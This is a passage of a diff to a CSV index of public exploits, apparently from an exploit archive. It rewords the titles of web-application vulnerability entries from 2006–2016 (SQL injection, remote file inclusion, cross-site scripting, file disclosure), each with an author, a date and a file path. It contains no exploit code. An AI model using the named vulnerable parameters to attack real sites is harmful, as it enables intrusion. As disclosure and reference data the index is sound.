Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29344,platforms/php/webapps/29344.txt,"phpCMS 1.1.7 - 'parser.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 29345,platforms/php/webapps/29345.txt,"phpCMS 1.1.7 - 'class.parser_PHPcms.php' Remote File Inclusion",2006-12-26,"Federico Fazzi",php,webapps,0 @@ -31190,15 +31191,15 @@ id,file,description,date,author,platform,type,port 29356,platforms/php/webapps/29356.txt,"WordPress 1.x/2.0.x - 'template.php' HTML Injection",2006-12-27,"David Kierznowski",php,webapps,0 29357,platforms/asp/webapps/29357.txt,"Hosting Controller 7C - FolderManager.aspx Directory Traversal",2006-12-27,KAPDA,asp,webapps,0 29358,platforms/asp/webapps/29358.txt,"DMXReady Secure Login Manager 1.0 - 'login.asp' sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 -29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - content.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 -29360,platforms/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - members.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 -29361,platforms/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - applications/SecureLoginManager/inc_secureloginmanager.asp sent Parameter SQL Injection",2006-12-27,Doz,asp,webapps,0 +29359,platforms/asp/webapps/29359.txt,"DMXReady Secure Login Manager 1.0 - 'content.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 +29360,platforms/asp/webapps/29360.txt,"DMXReady Secure Login Manager 1.0 - 'members.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 +29361,platforms/asp/webapps/29361.txt,"DMXReady Secure Login Manager 1.0 - 'applications/SecureLoginManager/inc_secureloginmanager.asp?sent' SQL Injection",2006-12-27,Doz,asp,webapps,0 29363,platforms/php/webapps/29363.txt,"PHP iCalendar 1.1/2.x - 'day.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29364,platforms/php/webapps/29364.txt,"PHP iCalendar 1.1/2.x - 'month.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29365,platforms/php/webapps/29365.txt,"PHP iCalendar 1.1/2.x - 'year.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29366,platforms/php/webapps/29366.txt,"PHP iCalendar 1.1/2.x - 'week.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29367,platforms/php/webapps/29367.txt,"PHP iCalendar 1.1/2.x - 'search.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 -29368,platforms/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - 'getdate' Parameter Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 +29368,platforms/php/webapps/29368.txt,"PHP iCalendar 1.1/2.x - 'getdate' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29369,platforms/php/webapps/29369.txt,"PHP iCalendar 1.1/2.x - 'print.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29370,platforms/php/webapps/29370.txt,"PHP iCalendar 1.1/2.x - 'preferences.php' Cross-Site Scripting",2006-12-27,Lostmon,php,webapps,0 29372,platforms/php/webapps/29372.txt,"Mobilelib Gold - Multiple Cross-Site Scripting Vulnerabilities",2006-12-29,"viP HaCKEr",php,webapps,0 @@ -31213,10 +31214,10 @@ id,file,description,date,author,platform,type,port 29385,platforms/asp/webapps/29385.txt,"Kolayindir Download - down.asp SQL Injection",2007-01-05,ShaFuck31,asp,webapps,0 29476,platforms/php/webapps/29476.txt,"Microweber 0.905 - Error-Based SQL Injection",2013-11-07,Zy0d0x,php,webapps,0 29389,platforms/multiple/webapps/29389.txt,"Practico 13.9 - Multiple Vulnerabilities",2013-11-03,LiquidWorm,multiple,webapps,0 -29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - 'edittag.cgi file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - 'edittag.pl file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 - 'edittag_mp.cgi file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 -29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 - 'edittag_mp.pl file' Parameter Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29390,platforms/cgi/webapps/29390.txt,"EditTag 1.2 - 'edittag.cgi?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29391,platforms/cgi/webapps/29391.txt,"EditTag 1.2 - 'edittag.pl?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29392,platforms/cgi/webapps/29392.txt,"EditTag 1.2 - 'edittag_mp.cgi?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 +29393,platforms/cgi/webapps/29393.txt,"EditTag 1.2 - 'edittag_mp.pl?file' Arbitrary File Disclosure",2007-01-05,NetJackal,cgi,webapps,0 29394,platforms/cgi/webapps/29394.txt,"EditTag 1.2 - mkpw_mp.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29395,platforms/cgi/webapps/29395.txt,"EditTag 1.2 - mkpw.pl plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 29396,platforms/cgi/webapps/29396.txt,"EditTag 1.2 - mkpw.cgi plain Parameter Cross-Site Scripting",2007-01-05,NetJackal,cgi,webapps,0 @@ -31225,62 +31226,62 @@ id,file,description,date,author,platform,type,port 29401,platforms/asp/webapps/29401.txt,"CreateAuction - Cats.asp SQL Injection",2007-01-08,IbnuSina,asp,webapps,0 29404,platforms/php/webapps/29404.txt,"MediaWiki 1.x - AJAX index.php Cross-Site Scripting",2007-01-09,"Moshe Ben-Abu",php,webapps,0 29405,platforms/php/webapps/29405.txt,"PHPKit 1.6.1 - comment.php SQL Injection",2007-01-09,yorn,php,webapps,0 -29407,platforms/php/webapps/29407.txt,"Magic Photo Storage Website - admin/admin_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29408,platforms/php/webapps/29408.txt,"Magic Photo Storage Website - admin/add_welcome_text.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29409,platforms/php/webapps/29409.txt,"Magic Photo Storage Website - admin/admin_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29410,platforms/php/webapps/29410.txt,"Magic Photo Storage Website - admin/add_templates.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29411,platforms/php/webapps/29411.txt,"Magic Photo Storage Website - admin/admin_paypal_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29412,platforms/php/webapps/29412.txt,"Magic Photo Storage Website - admin/approve_member.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29413,platforms/php/webapps/29413.txt,"Magic Photo Storage Website - admin/delete_member.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29414,platforms/php/webapps/29414.txt,"Magic Photo Storage Website - admin/index.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29415,platforms/php/webapps/29415.txt,"Magic Photo Storage Website - admin/list_members.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29407,platforms/php/webapps/29407.txt,"Magic Photo Storage Website - 'admin/admin_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29408,platforms/php/webapps/29408.txt,"Magic Photo Storage Website - 'admin/add_welcome_text.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29409,platforms/php/webapps/29409.txt,"Magic Photo Storage Website - 'admin/admin_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29410,platforms/php/webapps/29410.txt,"Magic Photo Storage Website - 'admin/add_templates.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29411,platforms/php/webapps/29411.txt,"Magic Photo Storage Website - 'admin/admin_paypal_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29412,platforms/php/webapps/29412.txt,"Magic Photo Storage Website - 'admin/approve_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29413,platforms/php/webapps/29413.txt,"Magic Photo Storage Website - 'admin/delete_member.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29414,platforms/php/webapps/29414.txt,"Magic Photo Storage Website - 'admin/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29415,platforms/php/webapps/29415.txt,"Magic Photo Storage Website - 'admin/list_members.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 40369,platforms/cgi/webapps/40369.sh,"PIKATEL 96338WS_ 96338L-2M-8M - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 -29416,platforms/php/webapps/29416.txt,"Magic Photo Storage Website - admin/membership_pricing.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29417,platforms/php/webapps/29417.txt,"Magic Photo Storage Website - admin/send_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29418,platforms/php/webapps/29418.txt,"Magic Photo Storage Website - include/config.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29419,platforms/php/webapps/29419.txt,"Magic Photo Storage Website - include/db_config.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29420,platforms/php/webapps/29420.txt,"Magic Photo Storage Website - user/add_category.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29421,platforms/php/webapps/29421.txt,"Magic Photo Storage Website - user/add_news.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29422,platforms/php/webapps/29422.txt,"Magic Photo Storage Website - user/change_catalog_template.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29423,platforms/php/webapps/29423.txt,"Magic Photo Storage Website - user/couple_milestone.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29424,platforms/php/webapps/29424.txt,"Magic Photo Storage Website - user/couple_profile.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29425,platforms/php/webapps/29425.txt,"Magic Photo Storage Website - user/delete_category.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29426,platforms/php/webapps/29426.txt,"Magic Photo Storage Website - user/index.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29427,platforms/php/webapps/29427.txt,"Magic Photo Storage Website - user/login.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29428,platforms/php/webapps/29428.txt,"Magic Photo Storage Website - user/logout.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29429,platforms/php/webapps/29429.txt,"Magic Photo Storage Website - user/register.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29430,platforms/php/webapps/29430.txt,"Magic Photo Storage Website - user/upload_photo.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29431,platforms/php/webapps/29431.txt,"Magic Photo Storage Website - user/user_catelog_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29432,platforms/php/webapps/29432.txt,"Magic Photo Storage Website - user/user_email.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29433,platforms/php/webapps/29433.txt,"Magic Photo Storage Website - user/user_extend.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 -29434,platforms/php/webapps/29434.txt,"Magic Photo Storage Website - user/user_membership_password.php _config[site_path] Parameter Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29416,platforms/php/webapps/29416.txt,"Magic Photo Storage Website - 'admin/membership_pricing.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29417,platforms/php/webapps/29417.txt,"Magic Photo Storage Website - 'admin/send_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29418,platforms/php/webapps/29418.txt,"Magic Photo Storage Website - 'include/config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29419,platforms/php/webapps/29419.txt,"Magic Photo Storage Website - 'include/db_config.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29420,platforms/php/webapps/29420.txt,"Magic Photo Storage Website - 'user/add_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29421,platforms/php/webapps/29421.txt,"Magic Photo Storage Website - 'user/add_news.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29422,platforms/php/webapps/29422.txt,"Magic Photo Storage Website - 'user/change_catalog_template.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29423,platforms/php/webapps/29423.txt,"Magic Photo Storage Website - 'user/couple_milestone.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29424,platforms/php/webapps/29424.txt,"Magic Photo Storage Website - 'user/couple_profile.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29425,platforms/php/webapps/29425.txt,"Magic Photo Storage Website - 'user/delete_category.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29426,platforms/php/webapps/29426.txt,"Magic Photo Storage Website - 'user/index.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29427,platforms/php/webapps/29427.txt,"Magic Photo Storage Website - 'user/login.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29428,platforms/php/webapps/29428.txt,"Magic Photo Storage Website - 'user/logout.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29429,platforms/php/webapps/29429.txt,"Magic Photo Storage Website - 'user/register.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29430,platforms/php/webapps/29430.txt,"Magic Photo Storage Website - 'user/upload_photo.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29431,platforms/php/webapps/29431.txt,"Magic Photo Storage Website - 'user/user_catelog_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29432,platforms/php/webapps/29432.txt,"Magic Photo Storage Website - 'user/user_email.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29433,platforms/php/webapps/29433.txt,"Magic Photo Storage Website - 'user/user_extend.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 +29434,platforms/php/webapps/29434.txt,"Magic Photo Storage Website - 'user/user_membership_password.php?_config[site_path]' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29435,platforms/multiple/webapps/29435.txt,"Apache Tomcat 5.5.25 - Cross-Site Request Forgery",2013-11-04,"Ivano Binetti",multiple,webapps,0 29437,platforms/php/webapps/29437.txt,"Easy Banner Pro 2.8 - 'info.php' Remote File Inclusion",2007-01-07,rUnViRuS,php,webapps,0 29438,platforms/php/webapps/29438.txt,"Edit-X - 'Edit_Address.php' Remote File Inclusion",2007-01-09,IbnuSina,php,webapps,0 29442,platforms/php/webapps/29442.html,"phpBB 2.0.21 - privmsg.php HTML Injection",2007-01-11,Demential,php,webapps,0 36794,platforms/multiple/webapps/36794.txt,"SevenIT SevDesk 3.10 - Multiple Web Vulnerabilities",2015-04-21,Vulnerability-Lab,multiple,webapps,0 29450,platforms/php/webapps/29450.txt,"Ezboxx 0.7.6 Beta - Multiple Input Validation Vulnerabilities",2007-01-12,"Doron P",php,webapps,0 -29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x - cp_downloads.php did Parameter SQL Injection",2007-01-12,Coloss,php,webapps,0 +29451,platforms/php/webapps/29451.txt,"All In One Control Panel 1.3.x - 'cp_downloads.php?did' SQL Injection",2007-01-12,Coloss,php,webapps,0 29453,platforms/php/webapps/29453.php,"PHP-Nuke 7.x - Block-Old_Articles.php SQL Injection",2007-01-13,Paisterist,php,webapps,0 -29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 - Logon.aspx sessionid Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 -29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 - Members1.aspx Multiple Parameter Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 -29477,platforms/php/webapps/29477.txt,"Indexu 5.0/5.3 - upgrade.php gateway Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29478,platforms/php/webapps/29478.txt,"Indexu 5.0/5.3 - suggest_category.php Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 - user_detail.php u Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 - tell_friend.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 - Sendmail.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29456,platforms/asp/webapps/29456.txt,"InstantASP 4.1 - 'Logon.aspx?sessionid' Cross-Site Scripting",2007-01-15,Doz,asp,webapps,0 +29457,platforms/asp/webapps/29457.txt,"InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities",2007-01-15,Doz,asp,webapps,0 +29477,platforms/php/webapps/29477.txt,"Indexu 5.0/5.3 - 'upgrade.php?gateway' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29478,platforms/php/webapps/29478.txt,"Indexu 5.0/5.3 - 'suggest_category.php?Error_msg' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29479,platforms/php/webapps/29479.txt,"Indexu 5.0/5.3 - 'user_detail.php?u' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29480,platforms/php/webapps/29480.txt,"Indexu 5.0/5.3 - 'tell_friend.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 +29481,platforms/php/webapps/29481.txt,"Indexu 5.0/5.3 - 'Sendmail.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 29464,platforms/php/webapps/29464.txt,"Liens_Dynamiques 2.1 - AdminLien.php Security Restriction Bypass",2007-01-15,sn0oPy,php,webapps,0 29466,platforms/php/webapps/29466.txt,"Liens_Dynamiques 2.1 - Multiple Unspecified Cross-Site Scripting Vulnerabilities",2007-01-15,sn0oPy,php,webapps,0 -29468,platforms/php/webapps/29468.txt,"Jax Petition Book 3.06 - jax_petitionbook.php languagepack Parameter Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 -29469,platforms/php/webapps/29469.txt,"Jax Petition 3.06 Book - smileys.php languagepack Parameter Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 +29468,platforms/php/webapps/29468.txt,"Jax Petition Book 3.06 - 'jax_petitionbook.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 +29469,platforms/php/webapps/29469.txt,"Jax Petition 3.06 Book - 'smileys.php?languagepack' Local File Inclusion",2007-01-15,"ilker Kandemir",php,webapps,0 29472,platforms/php/webapps/29472.txt,"DT_Guestbook 1.0 - 'index.php' Cross-Site Scripting",2007-01-16,"Jesper Jurcenoks",php,webapps,0 29482,platforms/php/webapps/29482.php,"WordPress Theme Kernel - Arbitrary File Upload",2013-11-07,link_satisi,php,webapps,0 -29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 - send_pwd.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 - search.php keyword Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29485,platforms/php/webapps/29485.txt,"Indexu 5.0/5.3 - register.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29486,platforms/php/webapps/29486.txt,"Indexu 5.0/5.3 - power_search.php Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - 'new.php' Multiple Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 -29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - 'mailing_list.php' Multiple Parameters Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29483,platforms/php/webapps/29483.txt,"Indexu 5.0/5.3 - 'send_pwd.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 +29484,platforms/php/webapps/29484.txt,"Indexu 5.0/5.3 - 'search.php?keyword' Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 +29485,platforms/php/webapps/29485.txt,"Indexu 5.0/5.3 - 'register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 +29486,platforms/php/webapps/29486.txt,"Indexu 5.0/5.3 - 'power_search.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 +29487,platforms/php/webapps/29487.txt,"Indexu 5.0/5.3 - 'new.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 +29488,platforms/php/webapps/29488.txt,"Indexu 5.0/5.3 - 'mailing_list.php' Multiple Cross-Site Scripting Vulnerabilities",2007-01-16,SwEET-DeViL,php,webapps,0 29489,platforms/php/webapps/29489.txt,"Indexu 5.0/5.3 - 'login.php' Error_msg Parameter Cross-Site Scripting",2007-01-16,SwEET-DeViL,php,webapps,0 29491,platforms/php/webapps/29491.txt,"MyBloggie 2.1.5 - 'index.php' Cross-Site Scripting",2007-01-17,CorryL,php,webapps,0 40368,platforms/cgi/webapps/40368.sh,"Inteno EG101R1 VoIP Router - Unauthenticated DNS Change",2016-09-13,"Todor Donev",cgi,webapps,80 @@ -31301,10 +31302,10 @@ id,file,description,date,author,platform,type,port 30036,platforms/php/webapps/30036.html,"WordPress Plugin Akismet 2.1.3 - Unspecified",2007-05-14,"David Kierznowski",php,webapps,0 30040,platforms/php/webapps/30040.txt,"Jetbox CMS 2.1 - Email FormMail.php Input Validation",2007-05-15,"Jesper Jurcenoks",php,webapps,0 30041,platforms/php/webapps/30041.txt,"Jetbox CMS 2.1 - 'view/search/' path Parameter Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 -30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Parameter Cross-Site Scripting",2007-05-15,"Mikhail Markin",php,webapps,0 +30042,platforms/php/webapps/30042.txt,"Jetbox CMS 2.1 - view/supplynews Multiple Cross-Site Scripting Vulnerabilities",2007-05-15,"Mikhail Markin",php,webapps,0 30047,platforms/php/webapps/30047.txt,"vBulletin 3.6.6 - calendar.php HTML Injection",2007-05-16,"laurent gaffie",php,webapps,0 30048,platforms/asp/webapps/30048.html,"VP-ASP Shopping Cart 6.50 - ShopContent.asp Cross-Site Scripting",2007-05-17,"John Martinelli",asp,webapps,0 -30050,platforms/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - header.php s Parameter Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 +30050,platforms/php/webapps/30050.html,"WordPress Theme Redoable 1.2 - 'header.php?s' Cross-Site Scripting",2007-05-17,"John Martinelli",php,webapps,0 30051,platforms/php/webapps/30051.txt,"PsychoStats 2.3 - 'Server.php' Full Path Disclosure",2007-05-17,kefka,php,webapps,0 30053,platforms/php/webapps/30053.txt,"ClientExec 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,r0t,php,webapps,0 30054,platforms/jsp/webapps/30054.txt,"SonicWALL Gms 7.x - Filter Bypass / Persistent Exploit",2013-12-05,Vulnerability-Lab,jsp,webapps,0 @@ -31320,7 +31321,7 @@ id,file,description,date,author,platform,type,port 29514,platforms/php/webapps/29514.txt,"appRain 3.0.2 - Blind SQL Injection",2013-11-08,"High-Tech Bridge SA",php,webapps,80 29515,platforms/php/webapps/29515.pl,"Flatpress 1.0 - Remote Code Execution",2013-11-08,Wireghoul,php,webapps,80 29516,platforms/hardware/webapps/29516.txt,"Vivotek IP Cameras - RTSP Authentication Bypass",2013-11-08,"Core Security",hardware,webapps,0 -29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php objectId' Parameter SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 +29517,platforms/php/webapps/29517.txt,"Project'Or RIA 3.4.0 - 'objectDetail.php?objectId' SQL Injection",2013-11-08,"Vicente Aguilera Diaz",php,webapps,80 29518,platforms/hardware/webapps/29518.txt,"Sagemcom F@st 3184 2.1.11 - Multiple Vulnerabilities",2013-11-08,"Oz Elisyan",hardware,webapps,80 29519,platforms/php/webapps/29519.txt,"Horde Groupware Web Mail Edition 5.1.2 - Cross-Site Request Forgery (2)",2013-11-08,"Marcela Benetrix",php,webapps,80 29521,platforms/php/webapps/29521.txt,"Virtual Host Administrator 0.1 - Modules_Dir Remote File Inclusion",2007-01-24,"Dr Max Virus",php,webapps,0 @@ -31332,8 +31333,8 @@ id,file,description,date,author,platform,type,port 29534,platforms/php/webapps/29534.txt,"SpoonLabs Vivvo Article Management CMS 3.40 - Show_Webfeed.php SQL Injection",2007-01-27,St[at]rExT,php,webapps,0 29537,platforms/php/webapps/29537.txt,"MDPro 1.0.76 - 'index.php' SQL Injection",2007-01-27,adexior,php,webapps,0 29539,platforms/php/webapps/29539.txt,"EncapsCMS 0.3.6 - 'common_foot.php' Remote File Inclusion",2007-01-30,Tr_ZiNDaN,php,webapps,0 -29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - setup.php PATH_INFO Parameter Cross-Site Scripting",2007-02-26,r00t,php,webapps,0 -29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - system/index.php Cookie PHPSESSID Parameter SQL Injection",2007-02-26,r00t,php,webapps,0 +29677,platforms/php/webapps/29677.txt,"Audins Audiens 3.3 - 'setup.php?PATH_INFO' Cross-Site Scripting",2007-02-26,r00t,php,webapps,0 +29678,platforms/php/webapps/29678.txt,"Audins Audiens 3.3 - 'system/index.php?Cookie PHPSESSID' SQL Injection",2007-02-26,r00t,php,webapps,0 29679,platforms/php/webapps/29679.html,"PHPBB2 - Admin_Ug_Auth.php Administrative Bypass",2007-02-26,"Hasadya Raed",php,webapps,0 29680,platforms/php/webapps/29680.html,"SQLiteManager 1.2 - main.php Multiple HTML Injection Vulnerabilities",2007-02-26,"Simon Bonnard",php,webapps,0 29681,platforms/php/webapps/29681.txt,"Pagesetter 6.2/6.3.0 - 'index.php' Local File Inclusion",2007-02-26,"D. Matscheko",php,webapps,0 @@ -31348,41 +31349,41 @@ id,file,description,date,author,platform,type,port 29560,platforms/php/webapps/29560.txt,"PHPProbid 5.24 - 'Lang.php' Remote File Inclusion",2007-02-02,"Hasadya Raed",php,webapps,0 29561,platforms/php/webapps/29561.txt,"Uebimiau 2.7.10 - 'index.php' Cross-Site Scripting",2007-02-02,Doz,php,webapps,0 29562,platforms/php/webapps/29562.txt,"PortailPHP 2 - 'mod_news/index.php' chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 -29563,platforms/php/webapps/29563.txt,"PortailPHP 2 - mod_news/goodies.php chemin Parameter Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 +29563,platforms/php/webapps/29563.txt,"PortailPHP 2 - 'mod_news/goodies.php?chemin' Traversal Arbitrary File Access",2007-02-03,"laurent gaffie",php,webapps,0 29564,platforms/php/webapps/29564.txt,"PortailPHP 2 - 'mod_news/index.php' chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29565,platforms/php/webapps/29565.txt,"PortailPHP 2 - 'mod_news/goodies.php' chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 -29566,platforms/php/webapps/29566.txt,"PortailPHP 2 - mod_search/index.php chemin Parameter Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 +29566,platforms/php/webapps/29566.txt,"PortailPHP 2 - 'mod_search/index.php?chemin' Remote File Inclusion",2007-02-03,"laurent gaffie",php,webapps,0 29567,platforms/cfm/webapps/29567.txt,"Adobe ColdFusion 6/7 - User_Agent Error Page Cross-Site Scripting",2007-02-05,digi7al64,cfm,webapps,0 -29568,platforms/php/webapps/29568.txt,"Coppermine Photo 